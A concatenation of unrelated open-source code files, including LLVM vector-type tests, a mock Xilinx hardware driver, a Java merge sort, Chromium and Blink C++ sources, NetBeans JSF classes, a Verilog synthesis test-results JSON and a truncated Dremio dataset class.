64U); EltCnt = ScV8Int64Ty->getElementCount(); EXPECT_EQ(EltCnt.getKnownMinValue(), 8U); ASSERT_TRUE(EltCnt.isScalable()); } TEST(VectorTypesTest, BaseVectorType) { LLVMContext Ctx; Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); std::array<VectorType *, 8> VTys = { VectorType::get(Int16Ty, ElementCount::getScalable(4)), VectorType::get(Int16Ty, ElementCount::getFixed(4)), VectorType::get(Int16Ty, ElementCount::getScalable(2)), VectorType::get(Int16Ty, ElementCount::getFixed(2)), VectorType::get(Int32Ty, ElementCount::getScalable(4)), VectorType::get(Int32Ty, ElementCount::getFixed(4)), VectorType::get(Int32Ty, ElementCount::getScalable(2)), VectorType::get(Int32Ty, ElementCount::getFixed(2))}; /* The comparison matrix is symmetric, so we only check the upper triangle: (0,0) (0,1) (0,2) ... (0,7) (1,0) (1,1) (1,2) . (2,0) (2,1) (2,2) . . . . . . . . (7,0) ... (7,7) */ for (size_t I = 0, IEnd = VTys.size(); I < IEnd; ++I) { // test I == J VectorType *VI = VTys[I]; ElementCount ECI = VI->getElementCount(); EXPECT_EQ(isa<ScalableVectorType>(VI), ECI.isScalable()); for (size_t J = I + 1, JEnd = VTys.size(); J < JEnd; ++J) { // test I < J VectorType *VJ = VTys[J]; EXPECT_VTY_NE(VI, VJ); VectorType *VJPrime = VectorType::get(VI->getElementType(), VJ); if (VI->getElementType() == VJ->getElementType()) { EXPECT_VTY_EQ(VJ, VJPrime); } else { EXPECT_VTY_NE(VJ, VJPrime); } EXPECT_EQ(VJ->getTypeID(), VJPrime->getTypeID()) << "VJ and VJPrime are the same sort of vector"; } } } TEST(VectorTypesTest, FixedLenComparisons) { LLVMContext Ctx; DataLayout DL(""); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); auto *V2Int32Ty = FixedVectorType::get(Int32Ty, 2); auto *V4Int32Ty = FixedVectorType::get(Int32Ty, 4); auto *V2Int64Ty = FixedVectorType::get(Int64Ty, 2); TypeSize V2I32Len = V2Int32Ty->getPrimitiveSizeInBits(); EXPECT_EQ(V2I32Len.getKnownMinSize(), 64U); EXPECT_FALSE(V2I32Len.isScalable()); EXPECT_LT(V2Int32Ty->getPrimitiveSizeInBits().getFixedSize(), V4Int32Ty->getPrimitiveSizeInBits().getFixedSize()); EXPECT_GT(V2Int64Ty->getPrimitiveSizeInBits().getFixedSize(), V2Int32Ty->getPrimitiveSizeInBits().getFixedSize()); EXPECT_EQ(V4Int32Ty->getPrimitiveSizeInBits(), V2Int64Ty->getPrimitiveSizeInBits()); EXPECT_NE(V2Int32Ty->getPrimitiveSizeInBits(), V2Int64Ty->getPrimitiveSizeInBits()); // Check that a fixed-only comparison works for fixed size vectors. EXPECT_EQ(V2Int64Ty->getPrimitiveSizeInBits().getFixedSize(), V4Int32Ty->getPrimitiveSizeInBits().getFixedSize()); // Check the DataLayout interfaces. EXPECT_EQ(DL.getTypeSizeInBits(V2Int64Ty), DL.getTypeSizeInBits(V4Int32Ty)); EXPECT_EQ(DL.getTypeSizeInBits(V2Int32Ty), 64U); EXPECT_EQ(DL.getTypeSizeInBits(V2Int64Ty), 128U); EXPECT_EQ(DL.getTypeStoreSize(V2Int64Ty), DL.getTypeStoreSize(V4Int32Ty)); EXPECT_NE(DL.getTypeStoreSizeInBits(V2Int32Ty), DL.getTypeStoreSizeInBits(V2Int64Ty)); EXPECT_EQ(DL.getTypeStoreSizeInBits(V2Int32Ty), 64U); EXPECT_EQ(DL.getTypeStoreSize(V2Int64Ty), 16U); EXPECT_EQ(DL.getTypeAllocSize(V4Int32Ty), DL.getTypeAllocSize(V2Int64Ty)); EXPECT_NE(DL.getTypeAllocSizeInBits(V2Int32Ty), DL.getTypeAllocSizeInBits(V2Int64Ty)); EXPECT_EQ(DL.getTypeAllocSizeInBits(V4Int32Ty), 128U); EXPECT_EQ(DL.getTypeAllocSize(V2Int32Ty), 8U); ASSERT_TRUE(DL.typeSizeEqualsStoreSize(V4Int32Ty)); } TEST(VectorTypesTest, ScalableComparisons) { LLVMContext Ctx; DataLayout DL(""); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); auto *ScV2Int32Ty = ScalableVectorType::get(Int32Ty, 2); auto *ScV4Int32Ty = ScalableVectorType::get(Int32Ty, 4); auto *ScV2Int64Ty = ScalableVectorType::get(Int64Ty, 2); TypeSize ScV2I32Len = ScV2Int32Ty->getPrimitiveSizeInBits(); EXPECT_EQ(ScV2I32Len.getKnownMinSize(), 64U); EXPECT_TRUE(ScV2I32Len.isScalable()); EXPECT_LT(ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_GT(ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_EQ(ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_NE(ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize()); // Check the DataLayout interfaces. EXPECT_EQ(DL.getTypeSizeInBits(ScV2Int64Ty), DL.getTypeSizeInBits(ScV4Int32Ty)); EXPECT_EQ(DL.getTypeSizeInBits(ScV2Int32Ty).getKnownMinSize(), 64U); EXPECT_EQ(DL.getTypeStoreSize(ScV2Int64Ty), DL.getTypeStoreSize(ScV4Int32Ty)); EXPECT_NE(DL.getTypeStoreSizeInBits(ScV2Int32Ty), DL.getTypeStoreSizeInBits(ScV2Int64Ty)); EXPECT_EQ(DL.getTypeStoreSizeInBits(ScV2Int32Ty).getKnownMinSize(), 64U); EXPECT_EQ(DL.getTypeStoreSize(ScV2Int64Ty).getKnownMinSize(), 16U); EXPECT_EQ(DL.getTypeAllocSize(ScV4Int32Ty), DL.getTypeAllocSize(ScV2Int64Ty)); EXPECT_NE(DL.getTypeAllocSizeInBits(ScV2Int32Ty), DL.getTypeAllocSizeInBits(ScV2Int64Ty)); EXPECT_EQ(DL.getTypeAllocSizeInBits(ScV4Int32Ty).getKnownMinSize(), 128U); EXPECT_EQ(DL.getTypeAllocSize(ScV2Int32Ty).getKnownMinSize(), 8U); ASSERT_TRUE(DL.typeSizeEqualsStoreSize(ScV4Int32Ty)); } TEST(VectorTypesTest, CrossComparisons) { LLVMContext Ctx; Type *Int32Ty = Type::getInt32Ty(Ctx); auto *V4Int32Ty = FixedVectorType::get(Int32Ty, 4); auto *ScV4Int32Ty = ScalableVectorType::get(Int32Ty, 4); // Even though the minimum size is the same, a scalable vector could be // larger so we don't consider them to be the same size. EXPECT_NE(V4Int32Ty->getPrimitiveSizeInBits(), ScV4Int32Ty->getPrimitiveSizeInBits()); // If we are only checking the minimum, then they are the same size. EXPECT_EQ(V4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); // We can't use ordering comparisons (<,<=,>,>=) between scalable and // non-scalable vector sizes. } } // end anonymous namespace
6,968
326
/* -- (c) Copyright 2014 Xilinx, Inc. All rights reserved. -- -- This file contains confidential and proprietary information -- of Xilinx, Inc. and is protected under U.S. and -- international copyright and other intellectual property -- laws. -- -- DISCLAIMER -- This disclaimer is not a license and does not grant any -- rights to the materials distributed herewith. Except as -- otherwise provided in a valid license issued to you by -- Xilinx, and to the maximum extent permitted by applicable -- law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND -- WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES -- AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING -- BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON- -- INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and -- (2) Xilinx shall not be liable (whether in contract or tort, -- including negligence, or under any other theory of -- liability) for any loss or damage of any kind or nature -- related to, arising under or in connection with these -- materials, including for any direct, or any indirect, -- special, incidental, or consequential loss or damage -- (including loss of data, profits, goodwill, or any type of -- loss or damage suffered as a result of any action brought -- by a third party) even if such damage or loss was -- reasonably foreseeable or Xilinx had been advised of the -- possibility of the same. -- -- CRITICAL APPLICATIONS -- Xilinx products are not designed or intended to be fail- -- safe, or for use in any application requiring fail-safe -- performance, such as life-support or safety devices or -- systems, Class III medical devices, nuclear facilities, -- applications related to the deployment of airbags, or any -- other applications that could lead to death, personal -- injury, or severe property or environmental damage -- (individually and collectively, "Critical -- Applications"). Customer assumes the sole risk and -- liability of any use of Xilinx products in Critical -- Applications, subject only to applicable laws and -- regulations governing limitations on product liability. -- -- THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS -- PART OF THIS FILE AT ALL TIMES. */ //provides the same functionality as the real uDriver, but //instead of talking to hardware it just pretends #include "uDriver.h" uDriver::uDriver(char* devFileName){ //could fork a new process here that simulates the hardware }; uDriver::~uDriver(){ }; int uDriver::ReadReg(int offset){ mtx.lock(); int r=1000; for(int i=0;i<200000;i++) r/=i; mtx.unlock(); return r; }; void uDriver::WriteReg(int offset, int wdata){ mtx.lock(); int r=349; for(int i=0;i<200000;i++) r/=i; mtx.unlock(); }; int uDriver::WriteData(char* buff, int size){ mtx.lock(); int r=345; for(int i=0;i<200000;i++) r/=i; mtx.unlock(); return 0; }; int uDriver::ReadData(char *buff, int size){ mtx.lock(); int r=3234444; for(int i=0;i<200000;i++) r/=i; mtx.unlock(); return 0; }; void uDriver::WriteFree(free_regs_t which, uint32_t value){ //WriteReg(0x30+4*which,value); }; bool uDriver::ReadFree(free_regs_t which, uint32_t &ret){ // ret=ReadReg(0x30+4*which); // return 0x80000000&ret; ret=0xf5ee0000+which; return false; }; bool uDriver::ReadDel(uint32_t &ret){ // ret=ReadReg(0x20); // return 0x80000000&ret; ret=0xde100000; }; uint32_t uDriver::ReadStats_precise(stats_reg_t which){ // return ReadReg(0x00+4*which); return 0x0000ffff; }; double uDriver::ReadStats_percent(stats_reg_t which){ uint32_t maxval=1<<22-1; uint32_t exact_val=ReadStats_precise(which); return (double)which/maxval*100; }; bool uDriver::isFlushReq(){ return false; }; void uDriver::sendFlushAck(){ }; bool uDriver::isFlushDone(){ }; void uDriver::softwareControlledReset(){ }; uint32_t uDriver::ReadRev(){ // return ReadReg(0xf0); return 99; };
1,469
1,184
/* * Written by: <NAME> * Last Update: December 29, 2013 */ public class MergeSort { /* * Inputs: * array - An array containing a sequence of integers. * start / end - The range that you want to sort. * * Output: * Although the function is void the original array will be sorted in the specified range. */ public static void mergeSort(int[] array, int start, int end){ if (start < end){ int middle = (end + start) / 2; mergeSort(array, start, middle); mergeSort(array, middle + 1, end); merge(array,start,middle,end); } } private static void merge(int[]array, int start, int middle, int end){ int size_1 = middle - start + 1; int size_2 = end - middle; int[] leftArray = new int[size_1]; int[] rightArray = new int[size_2]; for(int i = 0; i < size_1; i++){ leftArray[i] = array[start + i]; } for(int j = 0; j < size_2; j++){ rightArray[j] = array[j + middle + 1]; } int i = 0; int j = 0; for(int k = start; k <= end; k++){ if(i == size_1){ array[k] = rightArray[j]; j++; continue; } if(j == size_2){ array[k] = leftArray[i]; i++; continue; } if(leftArray[i] <= rightArray[j]){ array[k] = leftArray[i]; i++; }else{ array[k] = rightArray[j]; j++; } } } }
598
890
<gh_stars>100-1000 /* * MIT License * * Copyright (c) 2017 Twitter * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ // // endian_fix.h // ImageCore // // For OSes that use glibc < 2.9 (like RHEL5) // #pragma once #ifdef __APPLE__ #include <libkern/OSByteOrder.h> #define htobe16(x) OSSwapHostToBigInt16(x) #define htole16(x) OSSwapHostToLittleInt16(x) #define betoh16(x) OSSwapBigToHostInt16(x) #define letoh16(x) OSSwapLittleToHostInt16(x) #define htobe32(x) OSSwapHostToBigInt32(x) #define htole32(x) OSSwapHostToLittleInt32(x) #define betoh32(x) OSSwapBigToHostInt32(x) #define letoh32(x) OSSwapLittleToHostInt32(x) #define htobe64(x) OSSwapHostToBigInt64(x) #define htole64(x) OSSwapHostToLittleInt64(x) #define betoh64(x) OSSwapBigToHostInt64(x) #define letoh64(x) OSSwapLittleToHostInt64(x) #else #include <endian.h> #if defined(__USE_BSD) || defined(__USE_GNU) /* Conversion interfaces. */ #include <byteswap.h> #if __BYTE_ORDER == __LITTLE_ENDIAN #ifndef htobe16 #define htobe16(x) __bswap_16(x) #endif #ifndef htole16 #define htole16(x) (x) #endif #ifndef betoh16 #define betoh16(x) __bswap_16(x) #endif #ifndef letoh16 #define letoh16(x) (x) #endif #ifndef htobe32 #define htobe32(x) __bswap_32(x) #endif #ifndef htole32 #define htole32(x) (x) #endif #ifndef betoh32 #define betoh32(x) __bswap_32(x) #endif #ifndef letoh32 #define letoh32(x) (x) #endif #ifndef htobe64 #define htobe64(x) __bswap_64(x) #endif #ifndef htole64 #define htole64(x) (x) #endif #ifndef betoh64 #define betoh64(x) __bswap_64(x) #endif #ifndef letoh64 #define letoh64(x) (x) #endif #else /* __BYTE_ORDER == __LITTLE_ENDIAN */ #ifndef htobe16 #define htobe16(x) (x) #endif #ifndef htole16 #define htole16(x) __bswap_16(x) #endif #ifndef be16toh #define be16toh(x) (x) #endif #ifndef le16toh #define le16toh(x) __bswap_16(x) #endif #ifndef htobe32 #define htobe32(x) (x) #endif #ifndef htole32 #define htole32(x) __bswap_32(x) #endif #ifndef betoh32 #define betoh32(x) (x) #endif #ifndef letoh32 #define letoh32(x) __bswap_32(x) #endif #ifndef htobe64 #define htobe64(x) (x) #endif #ifndef htole64 #define htole64(x) __bswap_64(x) #endif #ifndef betoh64 #define betoh64(x) (x) #endif #ifndef letoh64 #define letoh64(x) __bswap_64(x) #endif #endif /* __BYTE_ORDER == __LITTLE_ENDIAN */ #endif /* __USE_BSD || __USE_GNU */ #endif /* __APPLE__ */
1,415
2,151
<gh_stars>1000+ // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_ #define COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_ #include <map> #include <memory> #include <string> #include <vector> #include "base/observer_list.h" #include "components/signin/core/browser/signin_manager.h" #include "google_apis/gaia/gaia_oauth_client.h" #include "google_apis/gaia/oauth2_token_service.h" class GoogleServiceAuthError; class ProfileOAuth2TokenService; namespace net { class URLRequestContextGetter; } namespace gcm { struct AccountIds { std::string account_key; // The account ID used by OAuth2TokenService. std::string gaia; std::string email; }; class AccountIdFetcher; // The AccountTracker keeps track of what accounts exist on the // profile and the state of their credentials. The tracker fetches the // gaia ID of each account it knows about. // // The AccountTracker maintains these invariants: // 1. Events are only fired after the gaia ID has been fetched. // 2. Add/Remove and SignIn/SignOut pairs are always generated in order. // 3. SignIn follows Add, and there will be a SignOut between SignIn & Remove. // 4. If there is no primary account, there are no other accounts. class AccountTracker : public OAuth2TokenService::Observer, public SigninManagerBase::Observer { public: AccountTracker(SigninManagerBase* signin_manager, ProfileOAuth2TokenService* token_service, net::URLRequestContextGetter* request_context_getter); ~AccountTracker() override; class Observer { public: virtual void OnAccountSignInChanged(const AccountIds& ids, bool is_signed_in) = 0; }; void Shutdown(); void AddObserver(Observer* observer); void RemoveObserver(Observer* observer); // Returns the list of accounts that are signed in, and for which gaia IDs // have been fetched. The primary account for the profile will be first // in the vector. Additional accounts will be in order of their gaia IDs. std::vector<AccountIds> GetAccounts() const; // Indicates if all user information has been fetched. If the result is false, // there are still unfinished fetchers. virtual bool IsAllUserInfoFetched() const; private: friend class AccountIdFetcher; struct AccountState { AccountIds ids; bool is_signed_in; }; // OAuth2TokenService::Observer implementation. void OnRefreshTokenAvailable(const std::string& account_key) override; void OnRefreshTokenRevoked(const std::string& account_key) override; void OnUserInfoFetchSuccess(AccountIdFetcher* fetcher, const std::string& gaia_id); void OnUserInfoFetchFailure(AccountIdFetcher* fetcher); // SigninManagerBase::Observer implementation. void GoogleSigninSucceeded(const std::string& account_id, const std::string& username) override; void GoogleSignedOut(const std::string& account_id, const std::string& username) override; void NotifySignInChanged(const AccountState& account); void UpdateSignInState(const std::string& account_key, bool is_signed_in); void StartTrackingAccount(const std::string& account_key); // Note: |account_key| is passed by value here, because the original // object may be stored in |accounts_| and if so, it will be destroyed // after erasing the key from the map. void StopTrackingAccount(const std::string account_key); void StopTrackingAllAccounts(); void StartFetchingUserInfo(const std::string& account_key); void DeleteFetcher(AccountIdFetcher* fetcher); SigninManagerBase* signin_manager_; ProfileOAuth2TokenService* token_service_; scoped_refptr<net::URLRequestContextGetter> request_context_getter_; std::map<std::string, std::unique_ptr<AccountIdFetcher>> user_info_requests_; std::map<std::string, AccountState> accounts_; base::ObserverList<Observer> observer_list_; bool shutdown_called_; }; class AccountIdFetcher : public OAuth2TokenService::Consumer, public gaia::GaiaOAuthClient::Delegate { public: AccountIdFetcher(OAuth2TokenService* token_service, net::URLRequestContextGetter* request_context_getter, AccountTracker* tracker, const std::string& account_key); ~AccountIdFetcher() override; const std::string& account_key() { return account_key_; } void Start(); // OAuth2TokenService::Consumer implementation. void OnGetTokenSuccess(const OAuth2TokenService::Request* request, const std::string& access_token, const base::Time& expiration_time) override; void OnGetTokenFailure(const OAuth2TokenService::Request* request, const GoogleServiceAuthError& error) override; // gaia::GaiaOAuthClient::Delegate implementation. void OnGetUserIdResponse(const std::string& gaia_id) override; void OnOAuthError() override; void OnNetworkError(int response_code) override; private: OAuth2TokenService* token_service_; net::URLRequestContextGetter* request_context_getter_; AccountTracker* tracker_; const std::string account_key_; std::unique_ptr<OAuth2TokenService::Request> login_token_request_; std::unique_ptr<gaia::GaiaOAuthClient> gaia_oauth_client_; }; } // namespace gcm #endif // COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_
1,923
2,151
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // This file has been auto-generated from the Jinja2 template // third_party/blink/renderer/bindings/templates/union_container.cpp.tmpl // by the script code_generator_v8.py. // DO NOT MODIFY! // clang-format off #include "third_party/blink/renderer/bindings/tests/results/core/double_or_string.h" #include "third_party/blink/renderer/bindings/core/v8/idl_types.h" #include "third_party/blink/renderer/bindings/core/v8/native_value_traits_impl.h" #include "third_party/blink/renderer/bindings/core/v8/to_v8_for_core.h" namespace blink { DoubleOrString::DoubleOrString() : type_(SpecificType::kNone) {} double DoubleOrString::GetAsDouble() const { DCHECK(IsDouble()); return double_; } void DoubleOrString::SetDouble(double value) { DCHECK(IsNull()); double_ = value; type_ = SpecificType::kDouble; } DoubleOrString DoubleOrString::FromDouble(double value) { DoubleOrString container; container.SetDouble(value); return container; } const String& DoubleOrString::GetAsString() const { DCHECK(IsString()); return string_; } void DoubleOrString::SetString(const String& value) { DCHECK(IsNull()); string_ = value; type_ = SpecificType::kString; } DoubleOrString DoubleOrString::FromString(const String& value) { DoubleOrString container; container.SetString(value); return container; } DoubleOrString::DoubleOrString(const DoubleOrString&) = default; DoubleOrString::~DoubleOrString() = default; DoubleOrString& DoubleOrString::operator=(const DoubleOrString&) = default; void DoubleOrString::Trace(blink::Visitor* visitor) { } void V8DoubleOrString::ToImpl(v8::Isolate* isolate, v8::Local<v8::Value> v8Value, DoubleOrString& impl, UnionTypeConversionMode conversionMode, ExceptionState& exceptionState) { if (v8Value.IsEmpty()) return; if (conversionMode == UnionTypeConversionMode::kNullable && IsUndefinedOrNull(v8Value)) return; if (v8Value->IsNumber()) { double cppValue = NativeValueTraits<IDLDouble>::NativeValue(isolate, v8Value, exceptionState); if (exceptionState.HadException()) return; impl.SetDouble(cppValue); return; } { V8StringResource<> cppValue = v8Value; if (!cppValue.Prepare(exceptionState)) return; impl.SetString(cppValue); return; } } v8::Local<v8::Value> ToV8(const DoubleOrString& impl, v8::Local<v8::Object> creationContext, v8::Isolate* isolate) { switch (impl.type_) { case DoubleOrString::SpecificType::kNone: return v8::Null(isolate); case DoubleOrString::SpecificType::kDouble: return v8::Number::New(isolate, impl.GetAsDouble()); case DoubleOrString::SpecificType::kString: return V8String(isolate, impl.GetAsString()); default: NOTREACHED(); } return v8::Local<v8::Value>(); } DoubleOrString NativeValueTraits<DoubleOrString>::NativeValue(v8::Isolate* isolate, v8::Local<v8::Value> value, ExceptionState& exceptionState) { DoubleOrString impl; V8DoubleOrString::ToImpl(isolate, value, impl, UnionTypeConversionMode::kNotNullable, exceptionState); return impl; } } // namespace blink
1,118
319
// // ISO8601ForCocoaTimeOnlyTests.h // ISO8601ForCocoa // // Created by <NAME> on 2013-09-17. // Copyright (c) 2013 <NAME>. All rights reserved. // #import <XCTest/XCTest.h> @interface ISO8601ForCocoaTimeOnlyTests : XCTestCase - (void) testParsingStringWithOnlyHourMinuteSecondZulu; - (void) testParsingStringWithOnlyHourMinuteZulu; - (void) testParsingStringWithOnlyHourMinuteSecondAndTimeZone; - (void) testParsingStringWithOnlyHourMinuteAndTimeZone; @end
178
682
{ "function_endfunction/function_call_function/no_arch": { "test_name": "function_endfunction/function_call_function/no_arch", "verilog": "function_call_function.v", "exit": 134, "errors": [ "function_call_function.v:22:1 [NETLIST] This output (simple_op.function_instance_0.function_instance_1^flip_one) must exist...must be an error" ] }, "function_endfunction/function_call_task_failure/no_arch": { "test_name": "function_endfunction/function_call_task_failure/no_arch", "verilog": "function_call_task_failure.v", "exit": 134, "errors": [ "function_call_task_failure.v:23:2 [AST] Function already has input with this name in" ], "warnings": [ "function_call_task_failure.v:11:8 [PARSE_TO_AST] error in parsing: (syntax error, unexpected '(', expecting '=')" ] }, "function_endfunction/function_input_failure/no_arch": { "test_name": "function_endfunction/function_input_failure/no_arch", "verilog": "function_input_failure.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "function_input_failure.v:8:1 [PARSE_TO_AST] error in parsing: (syntax error, unexpected ')')" ] }, "function_endfunction/inside_port/no_arch": { "test_name": "function_endfunction/inside_port/no_arch", "verilog": "inside_port.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "inside_port.v:9:2 [PARSE_TO_AST] error in parsing: (syntax error, unexpected ')', expecting ';' or ',')" ] }, "function_endfunction/multiple_inputs/no_arch": { "test_name": "function_endfunction/multiple_inputs/no_arch", "verilog": "multiple_inputs.v", "max_rss(MiB)": 11.5, "exec_time(ms)": 2.6, "elaboration_time(ms)": 0.3, "optimization_time(ms)": 0, "techmap_time(ms)": 0, "synthesis_time(ms)": 1.2, "Pi": 3, "Po": 1, "logic element": 4, "Longest Path": 5, "Average Path": 4, "Estimated LUTs": 4, "Total Node": 4 }, "function_endfunction/outside_port/no_arch": { "test_name": "function_endfunction/outside_port/no_arch", "verilog": "outside_port.v", "max_rss(MiB)": 15.2, "exec_time(ms)": 9.3, "elaboration_time(ms)": 2.5, "optimization_time(ms)": 0, "techmap_time(ms)": 0, "synthesis_time(ms)": 8, "Pi": 16, "Po": 16, "Longest Path": 2, "Average Path": 2 }, "function_endfunction/time_control_failure/no_arch": { "test_name": "function_endfunction/time_control_failure/no_arch", "verilog": "time_control_failure.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "time_control_failure.v:17:3 [PARSE_TO_AST] error in parsing: (syntax error, unexpected vALWAYS)" ] }, "DEFAULT": { "test_name": "n/a", "architecture": "n/a", "verilog": "n/a", "exit": 0, "leaks": 0, "errors": [], "warnings": [], "expectation": [], "max_rss(MiB)": -1, "exec_time(ms)": -1, "elaboration_time(ms)": -1, "optimization_time(ms)": -1, "techmap_time(ms)": -1, "synthesis_time(ms)": -1, "Latch Drivers": 0, "Pi": 0, "Po": 0, "logic element": 0, "latch": 0, "Adder": -1, "Multiplier": -1, "Memory": -1, "Hard Ip": -1, "generic logic size": -1, "Longest Path": 0, "Average Path": 0, "Estimated LUTs": 0, "Total Node": 0 } }
2,058
1,056
<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.web.jsf.impl.facesmodel; import java.util.ArrayList; import java.util.List; import org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty; import org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigVisitor; import org.w3c.dom.Element; /** * @author ads * */ class ManagedPropertyImpl extends IdentifiableDescriptionGroupImpl implements FacesManagedProperty { ManagedPropertyImpl( JSFConfigModelImpl model, Element element ) { super(model, element); } ManagedPropertyImpl( JSFConfigModelImpl model ) { this(model, createElementNS(model, JSFConfigQNames.MANAGED_PROPERTY)); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty#setPropertyClass(java.lang.String) */ public void setPropertyClass( String clazz ) { setChildElementText(PROPERT_CLASS, clazz, JSFConfigQNames.PROPERTY_CLASS.getQName(getNamespaceURI())); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty#setPropertyName(java.lang.String) */ public void setPropertyName( String name ) { setChildElementText(PROPERT_NAME, name, JSFConfigQNames.PROPERTY_NAME.getQName(getNamespaceURI())); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigComponent#accept(org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigVisitor) */ public void accept( JSFConfigVisitor visitor ) { visitor.visit( this ); } /** * Gets property-class of the faces-config-managed-propertyType. * @return trimmed property-class if any, {@code null} otherwise */ public String getPropertyClass() { String propertyClass = getChildElementText(JSFConfigQNames.PROPERTY_CLASS.getQName(getNamespaceURI())); return ElementTypeHelper.pickJavaTypeType(propertyClass); } /** * Gets property-name of the faces-config-managed-propertyType. * @return trimmed property-name if any, {@code null} otherwise */ public String getPropertyName() { String propertyName = getChildElementText(JSFConfigQNames.PROPERTY_NAME.getQName(getNamespaceURI())); return ElementTypeHelper.pickString(propertyName); } protected List<String> getSortedListOfLocalNames(){ return SORTED_ELEMENTS; } protected static final List<String> SORTED_ELEMENTS = new ArrayList<String>(5); static { SORTED_ELEMENTS.addAll( DESCRIPTION_GROUP_SORTED_ELEMENTS); SORTED_ELEMENTS.add( PROPERT_NAME); SORTED_ELEMENTS.add( PROPERT_CLASS ); } }
1,267
1,085
/* * Copyright (C) 2017-2019 Dremio Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.dremio.dac.model.sources; import java.util.HashMap; import java.util.List; import java.util.Map; import com.dremio.dac.model.common.AddressableResource; import com.dremio.dac.model.common.ResourcePath; import com.dremio.dac.model.job.JobFilters; import com.dremio.service.jobs.JobIndexKeys; import com.dremio.service.namespace.physicaldataset.proto.PhysicalDatasetConfig; import com.fasterxml.jackson.annotation.JsonCreator; import com.fasterxml.jackson.annotation.JsonIgnoreProperties; import com.fasterxml.jackson.annotation.JsonProperty; /** * Raw dataset/table */ @JsonIgnoreProperties(value={"links"}, allowGetters=true) public class PhysicalDataset implements AddressableResource { private final PhysicalDatasetConfig datasetConfig; private final PhysicalDatasetResourcePath resourcePath; private final PhysicalDatasetName datasetName; private final Integer jobCount; private final List<String> tags; @JsonCreator public PhysicalDataset( @JsonProperty("resourcePath") PhysicalDatasetResourcePath resourcePath, @JsonProperty("datasetName") PhysicalDatasetName datasetName, @JsonProperty("datasetConfig") PhysicalDatasetConfig datasetConfig, @JsonProperty("jobCount") Integer jobCount, @JsonProperty("tags") List<String> tags) { this.resourcePath = resourcePath; this.datasetName = datasetName; this.datasetConfig = datasetConfig; this.jobCount = jobCount; this.tags = tags; } @Override public ResourcePath getResourcePath() { return resourcePath; } public PhysicalDatasetConfig getDatasetConfig() { return datasetConfig; } public PhysicalDatasetName getDatasetName() { return datasetName; } public Integer getJobCount() { return jobCount; } public Map<String, 